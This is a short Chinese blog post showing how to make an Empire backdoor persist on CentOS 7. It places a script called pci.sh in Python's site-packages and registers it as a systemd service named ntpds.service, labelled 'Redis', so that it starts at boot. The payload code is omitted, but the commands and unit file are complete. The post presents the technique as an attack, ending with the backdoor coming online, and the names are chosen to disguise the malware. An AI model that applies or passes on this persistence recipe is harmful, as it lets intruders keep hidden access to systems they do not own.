centos7下面利用服务启动empire后门的方法

//centos7下面利用服务启动empire后门的方法：

vi /usr/lib/python2.7/site-packages/pci.sh //放入empire后门
chmod 755 /usr/lib/python2.7/site-packages/pci.sh
cd /usr/lib/systemd/system
vi ntpds.service
chmod 755 ntpds.service
systemctl enable ntpds.service //设置开机启动
systemctl start ntpds.service
systemctl status ntpds.service

//pci.sh是empire后门代码：
#!/bin/sh //开头不能少这句话
python后门代码略

//ntpds.service启动文件
[Unit]
Description=Redis
After=network.target remote-fs.target nss-lookup.target
 
[Service]
Type=forking
ExecStart=/usr/lib/python2.7/site-packages/pci.sh
ExecStop=
 
[Install]
WantedBy=multi-user.target

empire后门上线了：

posted @ 2020-01-08 11:21 pt007 阅读(520) 评论(0) 编辑收藏举报

刷新页面返回顶部

pt007

centos7下面利用服务启动empire后门的方法

公告